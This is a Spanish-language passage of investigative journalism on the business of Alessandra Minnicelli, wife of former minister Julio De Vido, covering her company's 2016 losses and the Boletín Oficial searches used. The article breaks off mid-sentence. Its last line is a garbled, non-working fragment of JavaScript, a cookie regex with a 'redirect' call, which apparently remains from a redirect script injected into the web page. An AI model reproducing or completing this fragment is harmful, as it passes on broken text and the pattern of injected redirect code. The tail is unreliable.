La empresa de la mujer de De Vido comenzó a perder plata cuando su marido dejó el poder

Contexto

El ex ministro de Planificación, Julio De Vido, fue uno de los funcionarios más polémicos y cuestionados de la administración Kirchner. Estuvo a cargo de una de las carteras más poderosas, que manejó fondos millonarios y encargó múltiples licitaciones. Las irregularidades en los manejos de esos recursos derivó en múltiples causas judiciales. Por una de ellas, De Vido está preso desde hace meses, al igual que muchos de sus colaboradores.
En paralelo, la mujer de De Vido, Alessandra Minnicelli, creó varias empresas y ganó visibilidad mediante la organización de congresos y la prestación de servicios de consultoría.
La investigación consta de dos notas, de las cuales presento la últma de ellos. La inquietud inicial surgió al ver el crecimiento de los negocios de Minnicelli en el sector privado. Luego de tener en cuenta las conductas cuestionables de De Vido, se me ocurrió que posiblemente el ministro de Planificación había quizás favorecido los negocios de su mujer. Inicié en ese momento un trabajo de búsqueda con diversas fuentes. Obtuve un dato que me sorprendió de Yacyretá: la empresa había destinado recursos a la participación en eventos organizados por la fundación de Minnicelli. En otros términos: una empresa controlada por su marido había destinado recursos públicos al negocio de Minnicelli.
Más me llamó la atención cuando obtuve un documento oficial de la empresa Nucleoeléctrica Argentina Sociedad Anónima, también bajo la responsabilidad de De Vido, en donde decía que participarían en un congreso organizado por Minnicelli a pedido expreso del Ministerio que manejaba su marido.
Con Cristina Kirchner fuera del poder, decidí continuar la investigación para intentar corroborar cuál había sido el efecto del alejamiento del poder de De Vido en los negocios de Minnicelli. Para eso obtuve los balances de su principal compañía y los analicé. El resultado fue elocuente: por primera vez en un período completo desde su creción, Fonres había perdido dinero en 2016, el primero en que su marido ya no era funcionario.

Metodología

Entre las fuentes utilizadas para esta investigación se encuentran el Boletín Oficial de la República Argentina, diversos boletines provinciales y los balances de la Inspección General de Justicia y la Comisión Nacional de Valores.

Del Boletín Oficial se utilizó la sección 2 del sitio. Allí se publican las sociedades que se crean y cualquier tipo de modificación relacionada a ellas. Estos cambios se agrupan bajo el nombre de “Avisos comerciales”. Un ejemplo de ellos son las modificaciones de sedes y las resoluciones de asamblea con la designación de las autoridades.

Para encontrar los datos referidos a la sociedad de la esposa de De Vido se recurrió a la sección “Búsqueda Avanzada” del Boletín Oficial para lograr localizar los documentos relacionados con la sociedad:

Luego de buscar por el nombre de la sociedad, se revisaron los avisos comerciales para chequear las últimas modificaciones societarias:

“; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}